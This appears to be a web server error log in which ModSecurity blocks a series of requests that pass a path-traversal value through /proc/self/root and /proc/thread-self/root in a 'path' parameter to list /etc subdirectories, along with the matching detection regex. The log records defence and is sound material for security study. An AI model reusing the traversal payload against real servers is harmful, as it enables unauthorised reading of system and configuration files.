[Tue Mar 17 18:28:13.666650 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.241.31:51578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHbQeiSKl8TjouI-YwuwAAA9Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:13.879958 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.241.31:51578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHbQeiSKl8TjouI-YwvAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:15.611600 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:34956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHb6BJNF7axNlVR0UxmQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:16.081501 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.128:59522] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHcKBJNF7axNlVR0UxmwAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:28:17.111112 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.241.31:34960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHcQeiSKl8TjouI-YwwwAAA9U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:18.300165 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:51272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHcsU6Sx0TG1YjmQjHYgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:19.559062 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:51282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHc-yqAr6etmhZHNpA2gAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:20.864533 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.241.31:51298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHdHIk7brgkOH-rIWmGAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:22.095538 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.241.31:51302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHdnIk7brgkOH-rIWmGQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:23.474684 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:51314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHd9Y0UrI5A3LftIwW7QAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:24.794023 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.31:51320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHeBj0p0SRWAqcjGGTOwAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:26.103512 2026] [:error] [pid 7004:tid 140411574073088] [client 74.7.241.31:51334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHesU6Sx0TG1YjmQjHagAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:28.848041 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.241.31:56922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHfBj0p0SRWAqcjGGTPgAAAwU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:31.175278 2026] [:error] [pid 7004:tid 140411716749056] [client 74.7.241.31:56936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHf8U6Sx0TG1YjmQjHbwAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:32.661364 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:56942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHgMU6Sx0TG1YjmQjHcQAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:34.131288 2026] [:error] [pid 6296:tid 140411632822016] [client 74.7.241.31:56948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHgnIk7brgkOH-rIWmIQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:35.133783 2026] [proxy_fcgi:error] [pid 29151:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:60336] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:28:35.520749 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:56954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHg9a6ubjKNq_cu4Yg5AAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:37.341104 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:55154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHhda6ubjKNq_cu4Yg6gAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:38.911498 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:55160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHhgeiSKl8TjouI-Yw0AAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:40.758215 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:55164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHiNY0UrI5A3LftIwW8wAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:42.172769 2026] [:error] [pid 6296:tid 140411641214720] [client 74.7.241.31:55180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHinIk7brgkOH-rIWmJAAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:43.762385 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:55184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHi3Ik7brgkOH-rIWmJwAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
